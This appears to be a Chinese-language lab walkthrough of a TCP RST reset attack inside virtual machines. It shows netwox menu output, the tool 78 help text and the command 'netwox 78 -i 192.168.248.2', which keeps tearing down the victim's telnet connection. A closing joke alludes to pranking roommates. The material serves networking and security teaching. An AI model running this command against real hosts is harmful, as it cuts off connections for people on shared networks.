TCP的RST復位攻擊
攻擊原理
(1)當A與B正在進行數據傳輸通信(已建立TCP連接);
(2)這時hacker僞裝了一個由服務器B給A發送的復位報文併發送給A;
(3)A收到該復位報文,則會立即釋放連接並清空緩存;
(4)hacker會一直監聽被攻擊者A是否發出TCP連接請求,一旦監聽到該TCP請求報文,hacker則會立即向被攻擊者A發送TCP RST復位報文,這就導致了A將無法再次連接上B。
實驗環境
說明:
被攻擊者A:Ubuntu虛擬機
服務器B:Metasploitable2 虛擬機
hacker:kali虛擬機
1、首先A要和B建立TCP連接,這裏我們使用A telnet B;
telnet成功:
2、在kali虛擬機(hacker)上查找netwox 78號工具來僞造一個TCP RST報文發送給A
netwox工具78號爲TCP 的Reset欺騙報文
kali@kali:~$ netwox
Netwox toolbox version 5.39.0. Netwib library version 5.39.0.
######################## MAIN MENU #########################
0 - leave netwox
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + information
b + network protocol
c + application protocol
d + sniff (capture network packets)
e + spoof (create and send packets)
f + record (file containing captured packets)
g + client
h + server
i + ping (check if a computer if reachable)
j + traceroute (obtain list of gateways)
k + scan (computer and port discovery)
l + network audit
m + brute force (check if passwords are weak)
n + remote administration
o + tools not related to network
Select a node (key in 03456abcdefghijklmno): b
##################### network protocol #####################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + Ethernet
b + IP
c + UDP
d + TCP
e + ICMP
f + ARP
Select a node (key in 0123456abcdef): d
########################### TCP ############################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + TCP spoof
b + TCP client
c + TCP server
d + network audit using TCP
e + dns
f + ftp
g + http
h + ident
i + irc
j + nntp
k + smb
l + smtp
m + telnet
n + whois
Select a node (key in 0123456abcdefghijklmn): d
################# network audit using TCP ##################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a - 76:Synflood
b - 77:Check if seqnum are predictible
c - 78:Reset every TCP packet
d - 79:Acknowledge every TCP SYN
Select a node (key in 0123456abcd): c
################# help for tool number 78 ##################
Title: Reset every TCP packet
+------------------------------------------------------------------------+
| This tool resets every TCP session matching a filter. It permits to |
| temporarily block a TCP flow without having to change firewall rules. |
| It also permits to force a renegotiation of session parameters, in |
| order to sniff the beginning of connection. |
| Parameter --device indicates on which device to sniff. Please note |
| that under some systems, such as Windows, sniffing on some devices is |
| not supported. |
| Parameter --filter defines the sniff filter. It permits to restrict |
| captured packets. This kind of filter is named a BPF or pcap filter. |
| Basic elements of a filter are: |
| host 1.2.3.4 |
| net 192.168.10 |
| net 192.168.10.0 mask 255.255.255.0 |
| net 192.168.10.0/24 |
| port 21 |
| dst host 1.2.3.4 |
| src port 2345 |
| ether host a:b:c:d:e:f ('ether a:b:c:d:e:f' is not working) |
| ether src aa:bb:cc:dd:ee:ff |
| ip |
| arp |
| rarp |
| tcp |
| icmp |
| udp |
| Here are filter examples: |
| "host 1.2.3.4" |
| "net 192.168 and icmp" |
| "host 1.2.3.4 or dst port 80" |
| "(udp or tcp) and not host 1.2.3.4" |
| Parameter --spoofip indicates how to generate link layer for spoofing. |
| Values 'best', 'link' or 'raw' are common choices for --spoofip. Here |
| is the list of accepted values: |
| - 'raw' means to spoof at IP4/IP6 level (it uses system IP stack). If |
| a firewall is installed, or on some systems, this might not work. |
| - 'linkf' means to spoof at link level (currently, only Ethernet is |
| supported). The 'f' means to Fill source Ethernet address. |
| However, if source IP address is spoofed, it might be impossible |
| to Fill it. So, linkf will not work: use linkb or linkfb instead. |
| - 'linkb' means to spoof at link level. The 'b' means to left a Blank |
| source Ethernet address (0:0:0:0:0:0, do not try to Fill it). |
| - 'linkfb' means to spoof at link level. The 'f' means to try to Fill |
| source Ethernet address, but if it is not possible, it is left |
| Blank. |
| - 'rawlinkf' means to try 'raw', then try 'linkf' |
| - 'rawlinkb' means to try 'raw', then try 'linkb' |
| - 'rawlinkfb' means to try 'raw', then try 'linkfb' |
| - 'linkfraw' means to try 'linkf', then try 'raw' |
| - 'linkbraw' means to try 'linkb', then try 'raw' |
| - 'linkfbraw' means to try 'linkfb', then try 'raw' |
| - 'link' is an alias for 'linkfb' |
| - 'rawlink' is an alias for 'rawlinkfb' |
| - 'linkraw' is an alias for 'linkfbraw' |
| - 'best' is an alias for 'linkraw'. It should work in all cases. |
| |
| This tool may need to be run with admin privilege in order to sniff |
| and spoof. |
+------------------------------------------------------------------------+
Usage: netwox 78 [-d device] [-f filter] [-s spoofip] [-i ips]
Parameters:
-d|--device device device name {Eth0}
-f|--filter filter pcap filter
-s|--spoofip spoofip IP spoof initialization type {linkbraw}
-i|--ips ips limit the list of IP addresses to reset {all}
Example: netwox 78
Press 'r' or 'k' to run this tool, or any other key to continue
攻擊指令:
netwox 78 -i 192.168.248.2
//表示向IP地址爲192.168.248.2這個主機發送一個TCP rst復位報文
注意:
在kali虛擬機上發送這個僞造報文指令,會處在一個卡住狀態,其實並不是卡住了,而是在監聽這個IP地址的主機有沒有發送TCP連接請求,一旦監聽到了有發送這個TCP請求報文,kali則會立即向該主機發送該僞造的TCP rst報文。
3、此時再來看被攻擊者A(ubuntu虛擬機),telnet已經斷開了,A如果想要再次telnetB,也會顯示無法連接
再次嘗試;telnetB,結果還是失敗:
通過在Ubuntu虛擬機上抓取數據包,可以看出有由hacker發送過來的RST復位報文:
4、一旦在kali虛擬機上停止攻擊,則Ubuntu(A)又可以去telnet B了
——————————————————————————————————————
注意:
親,這邊建議最好不要去惡搞舍友,因爲太費舍友了